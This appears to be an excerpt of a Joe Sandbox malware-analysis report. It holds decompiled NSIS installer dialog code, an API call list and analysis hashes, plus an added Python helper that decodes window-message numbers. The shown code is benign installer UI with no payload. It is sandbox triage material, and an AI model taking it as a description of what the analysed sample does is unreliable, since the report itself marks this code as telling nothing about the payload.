                                                                      				void* _v72;
                                                                      				intOrPtr _v76;
                                                                      				intOrPtr _v80;
                                                                      				void* _v84;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				struct HWND__* _t182;
                                                                      				int _t196;
                                                                      				long _t202;
                                                                      				signed int _t206;
                                                                      				signed int _t217;
                                                                      				void* _t220;
                                                                      				void* _t221;
                                                                      				int _t227;
                                                                      				signed int _t232;
                                                                      				signed int _t233;
                                                                      				signed int _t240;
                                                                      				struct HBITMAP__* _t250;
                                                                      				void* _t252;
                                                                      				intOrPtr _t258;
                                                                      				char* _t268;
                                                                      				signed char _t269;
                                                                      				long _t274;
                                                                      				int _t280;
                                                                      				signed int* _t281;
                                                                      				int _t282;
                                                                      				long _t283;
                                                                      				int _t285;
                                                                      				long _t286;
                                                                      				signed int _t287;
                                                                      				long _t288;
                                                                      				signed int _t291;
                                                                      				signed int _t298;
                                                                      				signed int _t300;
                                                                      				signed int _t302;
                                                                      				int* _t310;
                                                                      				void* _t311;
                                                                      				int _t315;
                                                                      				int _t316;
                                                                      				int _t317;
                                                                      				signed int _t318;
                                                                      				void* _t320;
                                                                      
                                                                      				_v12 = GetDlgItem(_a4, 0x3f9);
                                                                      				_t182 = GetDlgItem(_a4, 0x408);
                                                                      				_t280 =  *0x42f048;
                                                                      				_t320 = SendMessageA;
                                                                      				_v8 = _t182;
                                                                      				_t315 = 0;
                                                                      				_v32 = _t280;
                                                                      				_v20 =  *0x42f028 + 0x94;
                                                                      				if(_a8 != 0x110) {
                                                                      					L23:
                                                                      					if(_a8 != 0x405) {
                                                                      						_t289 = _a16;
                                                                      					} else {
                                                                      						_a12 = _t315;
                                                                      						_t289 = 1;
                                                                      						_a8 = 0x40f;
                                                                      						_a16 = 1;
                                                                      					}
                                                                      					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                      						_v16 = _t289;
                                                                      						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
                                                                      							if(( *0x42f031 & 0x00000002) != 0) {
                                                                      								L41:
                                                                      								if(_v16 != _t315) {
                                                                      									_t232 = _v16;
                                                                      									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                                                                      										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                                                                      									}
                                                                      									_t233 = _v16;
                                                                      									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                                                                      										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                                                                      											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
                                                                      										} else {
                                                                      											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      								goto L48;
                                                                      							}
                                                                      							if(_a8 == 0x413) {
                                                                      								L33:
                                                                      								_t289 = 0 | _a8 != 0x00000413;
                                                                      								_t240 = E00404638(_v8, _a8 != 0x413);
                                                                      								if(_t240 >= _t315) {
                                                                      									_t93 = _t280 + 8; // 0x8
                                                                      									_t310 = _t240 * 0x418 + _t93;
                                                                      									_t289 =  *_t310;
                                                                      									if((_t289 & 0x00000010) == 0) {
                                                                      										if((_t289 & 0x00000040) == 0) {
                                                                      											_t298 = _t289 ^ 0x00000001;
                                                                      										} else {
                                                                      											_t300 = _t289 ^ 0x00000080;
                                                                      											if(_t300 >= 0) {
                                                                      												_t298 = _t300 & 0xfffffffe;
                                                                      											} else {
                                                                      												_t298 = _t300 | 0x00000001;
                                                                      											}
                                                                      										}
                                                                      										 *_t310 = _t298;
                                                                      										E0040117D(_t240);
                                                                      										_t289 = 1;
                                                                      										_a8 = 0x40f;
                                                                      										_a12 = 1;
                                                                      										_a16 =  !( *0x42f030) >> 0x00000008 & 1;
                                                                      									}
                                                                      								}
                                                                      								goto L41;
                                                                      							}
                                                                      							_t289 = _a16;
                                                                      							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                      								goto L41;
                                                                      							}
                                                                      							goto L33;
                                                                      						} else {
                                                                      							goto L48;
                                                                      						}
                                                                      					} else {
                                                                      						L48:
                                                                      						if(_a8 != 0x111) {
                                                                      							L56:
                                                                      							if(_a8 == 0x200) {
                                                                      								SendMessageA(_v8, 0x200, _t315, _t315);
                                                                      							}
                                                                      							if(_a8 == 0x40b) {
                                                                      								_t220 =  *0x42a464;
                                                                      								if(_t220 != _t315) {
                                                                      									ImageList_Destroy(_t220);
                                                                      								}
                                                                      								_t221 =  *0x42a47c;
                                                                      								if(_t221 != _t315) {
                                                                      									GlobalFree(_t221);
                                                                      								}
                                                                      								 *0x42a464 = _t315;
                                                                      								 *0x42a47c = _t315;
                                                                      								 *0x42f080 = _t315;
                                                                      							}
                                                                      							if(_a8 != 0x40f) {
                                                                      								L86:
                                                                      								if(_a8 == 0x420 && ( *0x42f031 & 0x00000001) != 0) {
                                                                      									_t316 = (0 | _a16 == 0x00000020) << 3;
                                                                      									ShowWindow(_v8, _t316);
                                                                      									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                                                                      								}
                                                                      								goto L89;
                                                                      							} else {
                                                                      								E004011EF(_t289, _t315, _t315);
                                                                      								if(_a12 != _t315) {
                                                                      									E00401410(8);
                                                                      								}
                                                                      								if(_a16 == _t315) {
                                                                      									L73:
                                                                      									E004011EF(_t289, _t315, _t315);
                                                                      									_v32 =  *0x42a47c;
                                                                      									_t196 =  *0x42f048;
                                                                      									_v60 = 0xf030;
                                                                      									_v16 = _t315;
                                                                      									if( *0x42f04c <= _t315) {
                                                                      										L84:
                                                                      										InvalidateRect(_v8, _t315, 1);
                                                                      										if( *((intOrPtr*)( *0x42e7fc + 0x10)) != _t315) {
                                                                      											E00404556(0x3ff, 0xfffffffb, E0040460B(5));
                                                                      										}
                                                                      										goto L86;
                                                                      									}
                                                                      									_t281 = _t196 + 8;
                                                                      									do {
                                                                      										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                                                                      										if(_t202 != _t315) {
                                                                      											_t291 =  *_t281;
                                                                      											_v68 = _t202;
                                                                      											_v72 = 8;
                                                                      											if((_t291 & 0x00000001) != 0) {
                                                                      												_v72 = 9;
                                                                      												_v56 =  &(_t281[4]);
                                                                      												_t281[0] = _t281[0] & 0x000000fe;
                                                                      											}
                                                                      											if((_t291 & 0x00000040) == 0) {
                                                                      												_t206 = (_t291 & 0x00000001) + 1;
                                                                      												if((_t291 & 0x00000010) != 0) {
                                                                      													_t206 = _t206 + 3;
                                                                      												}
                                                                      											} else {
                                                                      												_t206 = 3;
                                                                      											}
                                                                      											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                                                                      											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
                                                                      											SendMessageA(_v8, 0x110d, _t315,  &_v72);
                                                                      										}
                                                                      										_v16 = _v16 + 1;
                                                                      										_t281 =  &(_t281[0x106]);
                                                                      									} while (_v16 <  *0x42f04c);
                                                                      									goto L84;
                                                                      								} else {
                                                                      									_t282 = E004012E2( *0x42a47c);
                                                                      									E00401299(_t282);
                                                                      									_t217 = 0;
                                                                      									_t289 = 0;
                                                                      									if(_t282 <= _t315) {
                                                                      										L72:
                                                                      										SendMessageA(_v12, 0x14e, _t289, _t315);
                                                                      										_a16 = _t282;
                                                                      										_a8 = 0x420;
                                                                      										goto L73;
                                                                      									} else {
                                                                      										goto L69;
                                                                      									}
                                                                      									do {
                                                                      										L69:
                                                                      										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
                                                                      											_t289 = _t289 + 1;
                                                                      										}
                                                                      										_t217 = _t217 + 1;
                                                                      									} while (_t217 < _t282);
                                                                      									goto L72;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                      							goto L89;
                                                                      						} else {
                                                                      							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                                                                      							if(_t227 == 0xffffffff) {
                                                                      								goto L89;
                                                                      							}
                                                                      							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                                                                      							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
                                                                      								_t283 = 0x20;
                                                                      							}
                                                                      							E00401299(_t283);
                                                                      							SendMessageA(_a4, 0x420, _t315, _t283);
                                                                      							_a12 = 1;
                                                                      							_a16 = _t315;
                                                                      							_a8 = 0x40f;
                                                                      							goto L56;
                                                                      						}
                                                                      					}
                                                                      				} else {
                                                                      					 *0x42f080 = _a4;
                                                                      					_t285 = 2;
                                                                      					_v28 = 0;
                                                                      					_v16 = _t285;
                                                                      					 *0x42a47c = GlobalAlloc(0x40,  *0x42f04c << 2);
                                                                      					_t250 = LoadBitmapA( *0x42f020, 0x6e);
                                                                      					 *0x42a470 =  *0x42a470 | 0xffffffff;
                                                                      					_v24 = _t250;
                                                                      					 *0x42a478 = SetWindowLongA(_v8, 0xfffffffc, E00404CB9);
                                                                      					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                      					 *0x42a464 = _t252;
                                                                      					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                                                                      					SendMessageA(_v8, 0x1109, _t285,  *0x42a464);
                                                                      					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                                                                      						SendMessageA(_v8, 0x111b, 0x10, 0);
                                                                      					}
                                                                      					DeleteObject(_v24);
                                                                      					_t286 = 0;
                                                                      					do {
                                                                      						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                                                                      						if(_t258 != _t315) {
                                                                      							if(_t286 != 0x20) {
                                                                      								_v16 = _t315;
                                                                      							}
                                                                      							_push(_t258);
                                                                      							_push(_t315);
                                                                      							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E004059C6(_t286, _t315, _t320)), _t286);
                                                                      						}
                                                                      						_t286 = _t286 + 1;
                                                                      					} while (_t286 < 0x21);
                                                                      					_t317 = _a16;
                                                                      					_t287 = _v16;
                                                                      					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                                                                      					_push(0x15);
                                                                      					E00403DAF(_a4);
                                                                      					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                                                                      					_push(0x16);
                                                                      					E00403DAF(_a4);
                                                                      					_t318 = 0;
                                                                      					_t288 = 0;
                                                                      					if( *0x42f04c <= 0) {
                                                                      						L19:
                                                                      						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                                      						goto L20;
                                                                      					} else {
                                                                      						_t311 = _v32 + 8;
                                                                      						_v24 = _t311;
                                                                      						do {
                                                                      							_t268 = _t311 + 0x10;
                                                                      							if( *_t268 != 0) {
                                                                      								_v60 = _t268;
                                                                      								_t269 =  *_t311;
                                                                      								_t302 = 0x20;
                                                                      								_v84 = _t288;
                                                                      								_v80 = 0xffff0002;
                                                                      								_v76 = 0xd;
                                                                      								_v64 = _t302;
                                                                      								_v40 = _t318;
                                                                      								_v68 = _t269 & _t302;
                                                                      								if((_t269 & 0x00000002) == 0) {
                                                                      									if((_t269 & 0x00000004) == 0) {
                                                                      										 *( *0x42a47c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                                      									} else {
                                                                      										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                                                                      									}
                                                                      								} else {
                                                                      									_v76 = 0x4d;
                                                                      									_v44 = 1;
                                                                      									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                                      									_v28 = 1;
                                                                      									 *( *0x42a47c + _t318 * 4) = _t274;
                                                                      									_t288 =  *( *0x42a47c + _t318 * 4);
                                                                      								}
                                                                      							}
                                                                      							_t318 = _t318 + 1;
                                                                      							_t311 = _v24 + 0x418;
                                                                      							_v24 = _t311;
                                                                      						} while (_t318 <  *0x42f04c);
                                                                      						if(_v28 != 0) {
                                                                      							L20:
                                                                      							if(_v16 != 0) {
                                                                      								E00403DE4(_v8);
                                                                      								_t280 = _v32;
                                                                      								_t315 = 0;
                                                                      								goto L23;
                                                                      							} else {
                                                                      								ShowWindow(_v12, 5);
                                                                      								E00403DE4(_v12);
                                                                      								L89:
                                                                      								return E00403E16(_a8, _a12, _a16);
                                                                      							}
                                                                      						}
                                                                      						goto L19;
                                                                      					}
                                                                      				}
                                                                      			}
                                                                      [Instruction address column for the decompiled function above (addresses 0x004046d6 through 0x00404ca2, with 0x00000000 for synthetic lines), detached from its code lines during extraction]
                                                                      0x00404898
                                                                      0x00404898
                                                                      0x00404863
                                                                      0x004048ce
                                                                      0x004048cf
                                                                      0x004048db
                                                                      0x004048db
                                                                      0x004048e8
                                                                      0x00404903
                                                                      0x00404907
                                                                      0x00404924
                                                                      0x00404929
                                                                      0x0040492c
                                                                      0x00000000
                                                                      0x00404909
                                                                      0x0040490e
                                                                      0x00404917
                                                                      0x00404ca4
                                                                      0x00404cb6
                                                                      0x00404cb6
                                                                      0x00404907
                                                                      0x00000000
                                                                      0x004048e8
                                                                      0x00404820

                                                                      APIs
                                                                      • GetDlgItem.USER32 ref: 004046CF
                                                                      • GetDlgItem.USER32 ref: 004046DC
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404728
                                                                      • LoadBitmapA.USER32 ref: 0040473B
                                                                      • SetWindowLongA.USER32 ref: 00404755
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404769
                                                                      • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 0040477D
                                                                      • SendMessageA.USER32(?,00001109,00000002), ref: 00404792
                                                                      • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 0040479E
                                                                      • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004047B0
                                                                      • DeleteObject.GDI32(?), ref: 004047B5
                                                                      • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004047E0
                                                                      • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004047EC
                                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404881
                                                                      • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004048AC
                                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 004048C0
                                                                      • GetWindowLongA.USER32 ref: 004048EF
                                                                      • SetWindowLongA.USER32 ref: 004048FD
                                                                      • ShowWindow.USER32(?,00000005), ref: 0040490E
                                                                      • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404A11
                                                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404A76
                                                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404A8B
                                                                      • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404AAF
                                                                      • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404AD5
                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404AEA
                                                                      • GlobalFree.KERNEL32 ref: 00404AFA
                                                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404B6A
                                                                      • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404C13
                                                                      • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404C22
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404C42
                                                                      • ShowWindow.USER32(?,00000000), ref: 00404C90
                                                                      • GetDlgItem.USER32 ref: 00404C9B
                                                                      • ShowWindow.USER32(00000000), ref: 00404CA2
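The API list above reports SendMessageA message numbers raw (0x1109, 0x111B, 0x419, ...). The Python below is an added example for reading such listings, not part of the Joe Sandbox report: it parses lines in the listing format shown above and resolves the message numbers to their Win32 names. The name table holds only constants taken from winuser.h / commctrl.h; WM_USER-range numbers (0x0400 to 0x7FFF) are control-specific, so unknown ones are left relative to WM_USER rather than guessed, and the PBM_* entries are right only when the target window is a progress bar (the hypothetical regex for the line format and the sample lines, copied from the listing above, are the example's own assumptions).

```python
"""Resolve the raw message numbers in a Joe Sandbox 'APIs' listing to Win32 names."""
import re
from dataclasses import dataclass
from typing import List, Optional

WM_USER = 0x0400

# Message numbers as defined in the Win32 headers (winuser.h / commctrl.h):
# LVM_* = 0x1000 + n, TVM_* = 0x1100 + n, PBM_* = WM_USER + n, CCM_SETBKCOLOR = 0x2001.
MESSAGE_NAMES = {
    0x007B: "WM_CONTEXTMENU",
    0x0110: "WM_INITDIALOG",
    0x0111: "WM_COMMAND",
    0x0143: "CB_ADDSTRING",
    0x0147: "CB_GETCURSEL",
    0x014E: "CB_SETCURSEL",
    0x0150: "CB_GETITEMDATA",
    0x0151: "CB_SETITEMDATA",
    0x0200: "WM_MOUSEMOVE",
    0x0401: "PBM_SETRANGE",        # WM_USER+1, valid only for a progress bar target
    0x0409: "PBM_SETBARCOLOR",     # WM_USER+9, same caveat
    0x1001: "LVM_SETBKCOLOR",
    0x1004: "LVM_GETITEMCOUNT",
    0x101B: "LVM_INSERTCOLUMNA",
    0x1024: "LVM_SETTEXTCOLOR",
    0x1026: "LVM_SETTEXTBKCOLOR",
    0x102D: "LVM_GETITEMTEXTA",
    0x1036: "LVM_SETEXTENDEDLISTVIEWSTYLE",
    0x1100: "TVM_INSERTITEMA",
    0x1102: "TVM_EXPAND",
    0x1109: "TVM_SETIMAGELIST",
    0x110A: "TVM_GETNEXTITEM",
    0x110D: "TVM_SETITEMA",
    0x111B: "TVM_SETITEMHEIGHT",
    0x111C: "TVM_GETITEMHEIGHT",
    0x2001: "PBM_SETBKCOLOR",      # CCM_SETBKCOLOR, shared by the common controls
}

# One listing line: "• SendMessageA.USER32(?,00001109,00000002), ref: 00404792"
# or, without arguments, "• GetDlgItem.USER32 ref: 004046CF" (assumed format).
API_LINE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiRef:
    api: str
    module: str
    args: List[Optional[int]]   # None where the listing shows '?'
    ref: int                    # address of the call site


def parse_api_line(line: str) -> Optional[ApiRef]:
    """Parse one listing line; return None for headers and other non-API text."""
    m = API_LINE.match(line)
    if m is None:
        return None
    args: List[Optional[int]] = []
    raw = m.group("args")
    if raw and raw.strip():
        for tok in raw.split(","):
            tok = tok.strip()
            args.append(None if tok == "?" else int(tok, 16))
    return ApiRef(m.group("api"), m.group("module"), args, int(m.group("ref"), 16))


def message_name(msg: int) -> str:
    """Name a window message; WM_USER-range numbers without a table entry stay relative."""
    if msg in MESSAGE_NAMES:
        return MESSAGE_NAMES[msg]
    if WM_USER <= msg < 0x8000:
        return "WM_USER+0x%X" % (msg - WM_USER)   # meaning depends on the target control
    return "0x%04X" % msg


def annotate(ref: ApiRef) -> str:
    """Render a parsed line; SendMessage calls get the decoded message number."""
    text = "%08X %s.%s" % (ref.ref, ref.api, ref.module)
    if ref.api.startswith("SendMessage") and len(ref.args) >= 2 and ref.args[1] is not None:
        text += "  msg=" + message_name(ref.args[1])
    return text


def annotate_listing(lines: List[str]) -> List[str]:
    refs = (parse_api_line(line) for line in lines)
    return [annotate(r) for r in refs if r is not None]


# Lines copied from the listing above (constructed input for the stand-alone run).
SAMPLE_LINES = [
    "• GetDlgItem.USER32 ref: 004046CF",
    "• GlobalAlloc.KERNEL32(00000040,?), ref: 00404728",
    "• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404769",
    "• SendMessageA.USER32(?,00001109,00000002), ref: 00404792",
    "• SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004047B0",
    "• SendMessageA.USER32(?,00000419,00000000,?), ref: 00404A11",
    "• SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004047E0",
    "• SendMessageA.USER32(?,00001102,00000410,?), ref: 00404C13",
]

if __name__ == "__main__":
    for entry in annotate_listing(SAMPLE_LINES):
        print(entry)
```

Run on the whole "APIs" block of a report, the output separates stock common-control plumbing (TVM_*, LVM_*, CB_*) from the calls worth following; a message that stays as WM_USER+n is the signal to look up the target control's class before assigning it a name.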
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                      • String ID: $M$N
                                                                      • API String ID: 1638840714-813528018
                                                                      • Opcode ID: 3d3a012deb5f043ffbbd430d6f659e7630f4d256b0a42b3255d05ae8089c2352
                                                                      • Instruction ID: d257be92f5ecdef9f5564086e86d6f95aaddda39fc654f176e6354e63e2cf52a
                                                                      • Opcode Fuzzy Hash: 3d3a012deb5f043ffbbd430d6f659e7630f4d256b0a42b3255d05ae8089c2352
                                                                      • Instruction Fuzzy Hash: EB0290B0E00208EFDB24DF65DD45AAE7BB5EB84314F10817AF610BA2E1C7799A51CF58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 90%
                                                                      			// Dialog procedure of the installer's progress/details page: _a4 = hwndDlg, _a8 = uMsg,
                                                                      			// _a12 = wParam, _a16 = lParam. The control IDs and private messages match the NSIS
                                                                      			// InstProc (0x3ec progress bar, 0x3ee intro text, 0x3f8 details list view, 0x403
                                                                      			// "Show details" button; 0x404 = WM_USER+4 install finished, 0x405 = WM_USER+5 start
                                                                      			// install). This is stock installer UI code, so it tells nothing about the payload.
                                                                      			E00404EA7(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                      				struct HWND__* _v8;
                                                                      				struct tagRECT _v24;
                                                                      				void* _v32;
                                                                      				signed int _v36;
                                                                      				int _v40;
                                                                      				int _v44;
                                                                      				signed int _v48;
                                                                      				int _v52;
                                                                      				void* _v56;
                                                                      				void* _v64;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				struct HWND__* _t86;
                                                                      				long _t87;
                                                                      				struct HMENU__* _t89;
                                                                      				unsigned int _t92;
                                                                      				int _t94;
                                                                      				void* _t101;
                                                                      				intOrPtr _t123;
                                                                      				struct HWND__* _t127;
                                                                      				int _t148;
                                                                      				int _t149;
                                                                      				long _t153;
                                                                      				struct HWND__* _t157;
                                                                      				struct HMENU__* _t159;
                                                                      				long _t161;
                                                                      				void* _t162;
                                                                      				short* _t163;
                                                                      
                                                                      				_t153 = _a8;
                                                                      				_t148 = 0;
                                                                      				_v8 =  *0x42e804;
                                                                      				if(_t153 != 0x110) {   // 0x110 = WM_INITDIALOG, handled after this block
                                                                      					if(_t153 == 0x405) {   // WM_USER+5: run the install on a worker thread, given the progress bar (0x3ec)
                                                                      						CloseHandle(CreateThread(0, 0, E00404E3B, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
                                                                      					}
                                                                      					if(_t153 != 0x111) {   // 0x111 = WM_COMMAND
                                                                      						L16:
                                                                      						if(_t153 != 0x404) {   // 0x404 = WM_USER+4: install thread finished
                                                                      							L24:
                                                                      							if(_t153 != 0x7b) {   // 0x7b = WM_CONTEXTMENU; only handled for the details list view
                                                                      								goto L19;
                                                                      							}
                                                                      							_t86 = _v8;
                                                                      							if(_a12 != _t86) {
                                                                      								goto L19;
                                                                      							}
                                                                      							_t87 = SendMessageA(_t86, 0x1004, _t148, _t148);   // LVM_GETITEMCOUNT
                                                                      							_a12 = _t87;
                                                                      							if(_t87 <= _t148) {
                                                                      								L36:
                                                                      								return 0;
                                                                      							}
                                                                      							_t89 = CreatePopupMenu();
                                                                      							_push(0xffffffe1);   // language string id of the single "copy to clipboard" menu entry
                                                                      							_push(_t148);
                                                                      							_t159 = _t89;
                                                                      							AppendMenuA(_t159, _t148, 1, E004059C6(_t148, _t153, _t159));   // E004059C6 resolves the string; item id 1
                                                                      							_t92 = _a16;
                                                                      							if(_t92 != 0xffffffff) {
                                                                      								_t149 = _t92;
                                                                      								_t94 = _t92 >> 0x10;
                                                                      							} else {
                                                                      								GetWindowRect(_v8,  &_v24);
                                                                      								_t149 = _v24.left;
                                                                      								_t94 = _v24.top;
                                                                      							}
                                                                      							if(TrackPopupMenu(_t159, 0x180, _t149, _t94, _t148, _a4, _t148) == 1) {   // TPM_NONOTIFY|TPM_RETURNCMD: 1 = entry chosen
                                                                      								_t161 = 1;           // running byte count, starts with the terminating NUL
                                                                      								_v56 = _t148;        // LVITEM (at _v64) .iSubItem = 0
                                                                      								_v44 = 0x42a488;     // LVITEM.pszText -> static scratch buffer
                                                                      								_v40 = 0xfff;        // LVITEM.cchTextMax
                                                                      								_a4 = _a12;          // hwndDlg slot reused as the item counter
                                                                      								do {   // first pass: LVM_GETITEMTEXT returns each line's length; +2 per line for CR LF
                                                                      									_a4 = _a4 - 1;
                                                                      									_t161 = _t161 + SendMessageA(_v8, 0x102d, _a4,  &_v64) + 2;
                                                                      								} while (_a4 != _t148);
                                                                      								OpenClipboard(_t148);
                                                                      								EmptyClipboard();
                                                                      								_t101 = GlobalAlloc(0x42, _t161);   // GMEM_MOVEABLE|GMEM_ZEROINIT: the final NUL comes from the zero fill
                                                                      								_a4 = _t101;
                                                                      								_t162 = GlobalLock(_t101);
                                                                      								do {   // second pass: each item is written straight into the global buffer, followed by CR LF
                                                                      									_v44 = _t162;   // LVITEM.pszText = current write position
                                                                      									_t163 = _t162 + SendMessageA(_v8, 0x102d, _t148,  &_v64);   // LVM_GETITEMTEXT
                                                                      									 *_t163 = 0xa0d;   // little-endian "\r\n"
                                                                      									_t162 = _t163 + 2;
                                                                      									_t148 = _t148 + 1;
                                                                      								} while (_t148 < _a12);
                                                                      								GlobalUnlock(_a4);
                                                                      								SetClipboardData(1, _a4);   // CF_TEXT; the HGLOBAL now belongs to the clipboard, hence no GlobalFree
                                                                      								CloseClipboard();
                                                                      							}
                                                                      							goto L36;
                                                                      						}
                                                                      						if( *0x42e7ec == _t148) {
                                                                      							ShowWindow( *0x42f024, 8);   // SW_SHOWNA
                                                                      							if( *0x42f0ac == _t148) {
                                                                      								E00404D69( *((intOrPtr*)( *0x429c58 + 0x34)), _t148);
                                                                      							}
                                                                      							E00403D88(1);
                                                                      							goto L24;
                                                                      						}
                                                                      						 *0x429850 = 2;
                                                                      						E00403D88(0x78);
                                                                      						goto L19;
                                                                      					} else {
                                                                      						if(_a12 != 0x403) {   // WM_COMMAND from anything but the "Show details" button goes to E00403E16
                                                                      							L19:
                                                                      							return E00403E16(_t153, _a12, _a16);
                                                                      						}
                                                                      						ShowWindow( *0x42e7f0, _t148);   // SW_HIDE the "Show details" button
                                                                      						ShowWindow(_v8, 8);               // SW_SHOWNA the details list view
                                                                      						E00404182();
                                                                      						goto L16;
                                                                      					}
                                                                      				}
                                                                      				_v48 = _v48 | 0xffffffff;
                                                                      				_v36 = _v36 | 0xffffffff;
                                                                      				_v56 = 2;   // LVCOLUMN (at _v56) .mask = LVCF_WIDTH; cx is filled in below from the client rect
                                                                      				_v52 = 0;
                                                                      				_v44 = 0;
                                                                      				_v40 = 0;
                                                                      				asm("stosd");
                                                                      				asm("stosd");
                                                                      				_t123 =  *0x42f028;
                                                                      				_a12 =  *((intOrPtr*)(_t123 + 0x5c));
                                                                      				_a8 =  *((intOrPtr*)(_t123 + 0x60));
                                                                      				 *0x42e7f0 = GetDlgItem(_a4, 0x403);   // "Show details" button
                                                                      				 *0x42e7e8 = GetDlgItem(_a4, 0x3ee);   // intro text
                                                                      				_t127 = GetDlgItem(_a4, 0x3f8);        // details list view
                                                                      				 *0x42e804 = _t127;
                                                                      				_v8 = _t127;
                                                                      				E00403DE4( *0x42e7f0);
                                                                      				 *0x42e7f4 = E0040460B(4);
                                                                      				 *0x42e80c = 0;
                                                                      				GetClientRect(_v8,  &_v24);
                                                                      				_v48 = _v24.right - GetSystemMetrics(0x15);   // LVCOLUMN.cx = client width minus SM_CXVSCROLL
                                                                      				SendMessageA(_v8, 0x101b, 0,  &_v56);          // LVM_INSERTCOLUMN
                                                                      				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);     // LVM_SETEXTENDEDLISTVIEWSTYLE, LVS_EX_LABELTIP
                                                                      				if(_a12 >= 0) {   // list view colours read from the installer header (+0x5c background, +0x60 text)
                                                                      					SendMessageA(_v8, 0x1001, 0, _a12);   // LVM_SETBKCOLOR
                                                                      					SendMessageA(_v8, 0x1026, 0, _a12);   // LVM_SETTEXTBKCOLOR
                                                                      				}
                                                                      				if(_a8 >= _t148) {
                                                                      					SendMessageA(_v8, 0x1024, _t148, _a8);   // LVM_SETTEXTCOLOR
                                                                      				}
                                                                      				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                      				_push(0x1b);
                                                                      				E00403DAF(_a4);
                                                                      				if(( *0x42f030 & 0x00000003) != 0) {   // header flags: bit 1 show details at once, bit 2 never show the button
                                                                      					ShowWindow( *0x42e7f0, _t148);
                                                                      					if(( *0x42f030 & 0x00000002) != 0) {
                                                                      						 *0x42e7f0 = _t148;
